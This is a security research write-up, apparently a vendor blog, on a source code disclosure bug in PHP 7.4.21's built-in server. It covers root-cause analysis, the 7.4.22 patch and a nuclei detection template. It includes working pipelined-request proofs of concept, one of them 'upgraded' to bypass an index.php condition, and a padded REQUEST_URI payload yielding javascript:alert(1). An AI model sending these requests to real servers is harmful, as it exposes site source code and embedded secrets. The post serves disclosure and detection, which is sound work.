Introduction
While testing request pipelining on multiple programming language built-in servers, we observed strange behavior with PHP’s. As we delved deeper, we discovered a security bug in PHP that could expose the source code of PHP files as if they were static files rather than executing them as intended.
Upon further testing, we found that the vulnerability was not present in the latest PHP release. We conducted further tests on different versions of PHP to determine when the bug was fixed, and why. Our investigation led us to the patched version of PHP 7.4.22, and a comparison of the unpatched versus patched code allowed us to see the specific changes made to fix the vulnerability.
It’s important to note that while this issue has been resolved in the PHP source code, Shodan queries reveal many exposed instances of the built-in server. Join us as we detail our findings and share what we learned through our analysis.
Root Cause Analysis
This is the unpatched and patched version git diff - https://github.com/php/php-src/compare/PHP-7.4.21...php-7.4.22
To fully understand the bug and how it was fixed, we compiled both the patched and unpatched versions of PHP with debugging symbols enabled. Using a proof-of-concept (PoC) request, we triggered the source code disclosure bug and observed the code flow in the debugger.
PoC Request:
GET /phpinfo.php HTTP/1.1
Host: pd.research
\r\n
\r\n
GET / HTTP/1.1
\r\n
\r\n
All the HTTP requests to the CLI server are handled by php_cli_server_client_read_request
. The trace looks like this:
main(...)
do_cli_server(...)
php_cli_server_do_event_loop(...)
php_cli_server_do_event_for_each_fd(...)
php_cli_server_poller_iter_on_active(...)
php_cli_server_do_event_for_each_fd_callback(...)
php_cli_server_recv_event_read_request(...)
php_cli_server_client_read_request(...)
The php_cli_server_client_read_request
function calls the php_http_parser_execute
function and, as its name suggests, is used to parse HTTP requests. The return value of the function is the number of bytes that were successfully parsed. This value is used to determine how much of the request has been processed and how much remains to be parsed.
When the first part of the request mentioned below is almost finished being parsed:
GET /phpinfo.php HTTP/1.1
Host: pd.research
\r\n
\r\n
and the HTTP request doesn't contain the Content-Length
header, the CALLBACK2(message_complete)
in the code below called. Here, CALLBACK2
is a macro that in turn calls a callback function php_cli_server_client_read_request_on_message_complete
upon completion of processing of the request message.
How does CALLBACK2(…) work?
The CALLBACK2 Macro is defined here: https://github.com/php/php-src/blob/PHP-7.4.21/sapi/cli/php_http_parser.c#L31-L37:
#define CALLBACK2(FOR) \\
do { \\
if (settings->on_##FOR) { \\
if (0 != settings->on_##FOR(parser)) return (p - data); \\
} \\
} \\
while (0)
After preprocessing, CALLBACK2(message_complete) converts to:
do {
if (settings->on_message_complete) {
if (0 != **settings->on_message_complete**(parser)) return (p - data);
}
} while (0)
settings is a struct of type php_http_parser_settings
whose member fields (function pointers) are declared here:
Each member of the settings variable is populated with respective callback functions.
https://github.com/php/php-src/blob/PHP-7.4.21/sapi/cli/php_cli_server.c#L1803-L1813
This reference to settings is then passed to php_http_parser_execute
function as an argument.
nbytes_consumed = php_http_parser_execute(&client->parser, &settings, buf, nbytes_read);
https://github.com/php/php-src/blob/PHP-7.4.21/sapi/cli/php_cli_server.c#L1840
Similarly, there are CALLBACK
and CALLBACK_NOCLEAR
macros that work almost in the same way.
Therefore,CALLBACK2(message_complete)
results in calling php_cli_server_client_read_request_on_message_complete(...)
and CALLBACK(path)
calls php_cli_server_client_read_request_on_path(...)
and so on.
Soon, we enter the php_cli_server_request_translate_vpath
function. This function converts the requested PHP file's path to the full path on the file system. If the requested file is a directory, it checks for the presence of index files such as index.php
or index.html
within the directory and uses the path to one of those files if found. This allows the server to serve the correct file in response to a request
In short, this function sets vpath
and path_translated
members to the request
struct. So, for the currently parsed request,
GET /phpinfo.php HTTP/1.1
Host: pd.research
\r\n
\r\n
we end up inside this conditional branch where the **request->path_translated**
is set. This is important and will be used later.
After the function call stack unwinds, we continue our execution of the flow inside php_http_parser_execute
. Now, the 2nd part of the request is parsed as the state is reverted to start_state
:
GET / HTTP/1.1
\r\n
\r\n
Just as with the initial request, we enter the php_cli_server_client_read_request_on_message_complete
function and then call php_cli_server_request_translate_vpath
. This process is used to parse and process the subsequent request in the same way as the first request.
This time, inside php_cli_server_request_translate_vpath
, since we are requesting a directory (/
) instead of a file, we will enter a different block of code.
Finally, after the request's parsing is completed, and we return from php_http_parser_execute
. The return values of length of bytes parsed (nbytes_consumed
) and length of bytes read (nbytes_read
) are compared (more on this here). If they are equal, the code flow continues and we enter the php_cli_server_dispatch
function.
The code provided above includes a check to determine whether a requested file should be treated as a static file or executed as a PHP file. This is done by examining the extension of the file. If the extension is not .php
or .PHP
, or if the length of the extension is not equal to 3, the file is considered to be a static file. This is indicated by setting the is_static_file
variable to 1.
The code also checks that the path_translated
field of the client->request
object is not null. This field contains the full path to the requested file on the file system, and is used to locate and serve the file. If the path_translated
field is null, it indicates that the requested file could not be found, and the request will be treated as an error.
The code flow proceeds to the php_cli_server_begin_send_static
function because is_static_file
is set to true.
What went wrong?
Here lies the bug. As seen in the aforementioned code blocks, after parsing of the second request the vpath
is set to /
and assuming no index files were found the client->request.ext
will be set to NULL
. However, the client->request.path_translated
is still set to /tmp/php/phpinfo.php
from the first request. The checks are performed on the client->request.ext
of second request and we enter this branch and which sets is_static_file
to 1
. Basically, saying treat the requested file as a static file and not a PHP script.
Notice that this function opens and retrieves a file descriptor to the file path stored in client->request.path_translated
. In our example, client->request.path_translated
would be set to /tmp/php/phpinfo.php
. This discrepancy, where the checks happen on the client->request.ext
of the second request but afterward the file is opened on client->request.path_translated
which was set by the first request, leads to source code disclosure.
Now as the file is marked as is_static_file
, the code flow now simply reads the fd and returns it as static file rather than executing it.
Patch
A check was introduced in PHP 7.4.22. This fix checks if the vpath
member of the request
struct is not NULL when parsing the request path. If it is not NULL, the function returns 1.
When the path of the first part of request message is parsed, the client->request.vpath
is initially NULL and later on set to /phpinfo.php
. However, when the path of second part of the request is parsed, the client->request.vpath
is already set and not NULL which causes the function to return 1.
#define CALLBACK(FOR) \\
do { \\
CALLBACK_NOCLEAR(FOR); \\
FOR##_mark = NULL; \\
} while (0)
#define CALLBACK_NOCLEAR(FOR) \\
do { \\
if (FOR##_mark) { \\
if (settings->on_##FOR) { \\
if (0 != settings->on_##FOR(parser, \\
FOR##_mark, \\
p - FOR##_mark)) \\
{ \\
return (p - data); \\
} \\
} \\
} \\
} while (0)
While parsing the path of the second request we enter into this patched function php_cli_server_client_read_request_on_path
from CALLBACK(path)
here. The CALLBACK(path)
macro check ensures that the return value of the callback function is always 0. If that’s not the case, we will return from the parsing function php_http_parser_execute
and the return value would be the number of bytes it has already consumed while parsing the request.
The return value is stored in nbytes_consumed
variable and is compared with nbytes_read
(i.e., the actual number of bytes in the request).
nbytes_consumed = php_http_parser_execute(&client->parser, &settings, buf, nbytes_read);
if (**nbytes_consumed != (size_t)nbytes_read**) {
if (php_cli_server_log_level >= PHP_CLI_SERVER_LOG_ERROR) {
if (buf[0] & 0x80 /* SSLv2 */ || buf[0] == 0x16 /* SSLv3/TLSv1 */) {
*errstr = estrdup("Unsupported SSL request");
} else {
*errstr = estrdup("Malformed HTTP request");
}
}
return -1;
}
If the number of bytes consumed by the parser is not equal to the total number of bytes read, it means that the request is malformed. In this case, the code checks the first byte of the buffer to determine whether the request is an SSL request. Otherwise, it sets the error message to “Malformed HTTP request” and returns.
Bonus
A different bug that fortunately also addressed this remote source code disclosure issue in subsequent versions is https://bugs.php.net/bug.php?id=73630. During the parsing of an HTTP request, when certain callbacks are called multiple times, the REQUEST_URI
server variable gets overwritten with a substring of itself.
This behavior can result in open redirects or cross-site scripting (XSS) attacks in some cases. Here’s an example:
Example Snippet:
<a href="<?php echo htmlentities($_SERVER['REQUEST_URI']) ?>">Unexpected url</a>
requesting GET /index.php?abcd
will result in being rendered as:
<a href="/index.php?abcd">Unexpected url</a>
The hyperlink will always be relative to the domain where it is hosted. Also, the path would convert meta-characters to their HTML entities. Therefore, XSS is not feasible.
However, this can still be exploited by an attacker by sending a GET request with a very long query string in the URL, such as the one shown in the example.
GET /?[AAAA...<1425 times>]javascript:alert(1) HTTP/1.1
Host: pd.research
The REQUEST_URI
is overwritten and only ends up with javascript:alert(1)
. The amount of padding required to be successfully overwrite it with desired content varies and may need to be adjusted.
Proof of Concept
Basic POC:
GET /phpinfo.php HTTP/1.1
Host: pd.research
\r\n
GET / HTTP/1.1
\r\n
\r\n
The above request provides a basic HTTP request as a proof of concept that will disclose the source code phpinfo.php
instead of executing it.
We observed that the source code won’t be disclosed if the index.php
file exists in the current directory where the server is started from. However, we came up with a slight modification of the exploit POC that would disclose the source code regardless of, if the index.php
file exists or not. The reason for this lies in the above explanation of the bug.
Upgraded POC:
GET /index.php HTTP/1.1
Host: pd.research
\r\n
GET /xyz.xyz HTTP/1.1
\r\n
\r\n
Nuclei Template:
To ease the detection in an automated way against a large set of hosts, we have created nuclei template and added it to the public nuclei-template GitHub repository.
Template pull request: https://github.com/projectdiscovery/nuclei-templates/pull/6633
id: php-src-diclosure
info:
name: PHP <= 7.4.21 - Built-in Server Remote Source Disclosure
author: pdteam
severity: medium
metadata:
verified: true
shodan-query: The requested resource <code class="url">
tags: php,phpcli,disclosure
requests:
- raw:
- |+
GET / HTTP/1.1
Host: {{Hostname}}
GET /{{rand_base(3)}}.{{rand_base(2)}} HTTP/1.1
- |+
GET / HTTP/1.1
Host: {{Hostname}}
unsafe: true
matchers:
- type: dsl
dsl:
- 'contains(body_1, "<?php")'
- '!contains(body_2, "<?php")'
condition: and
Demo
cat index.php
<a href="<?php echo htmlentities($_SERVER['REQUEST_URI']) ?>">Unexpected url</a>
cat Dockerfile
FROM php:7.4.21-zts-buster
COPY index.php /var/www/html/index.php
CMD ["php", "-S", "0.0.0.0:8888", "-t", "/var/www/html/"]
docker build . -t phptest
docker run -p 8888:8888 phptest
[Sat Jan 28 20:09:07 2023] PHP 7.4.21 Development Server (http://0.0.0.0:8888) started
Conclusion
In conclusion, our research aimed to investigate request pipelining on multilayered architecture. As part of our study, we examined the PHP built-in server and stumbled upon a security bug present in an older version of PHP on the test server. This vulnerability could allow the source code of PHP files to be exposed as if they were static files. Our investigation led us to identify that the issue was fixed in the later version of PHP, specifically PHP 7.4.22
It is important to note, even though the PHP team advises not to use the CLI server in production, there are at least a few thousand exposed instances of the built-in server are still present on the Internet. Additionally, it's possible that the PHP CLI server can be behind multiple reverse proxies or load balancers, which would make it more challenging to exploit. In our testing using servers such as NGINX and Apache in conjunction with PHP CLI Server, we were unable to exploit the vulnerability. We welcome feedback from readers on any other configurations or methods that may be used to exploit this vulnerability.
- Rahul Maini, Harsh Jaiswal @ ProjectDiscovery Research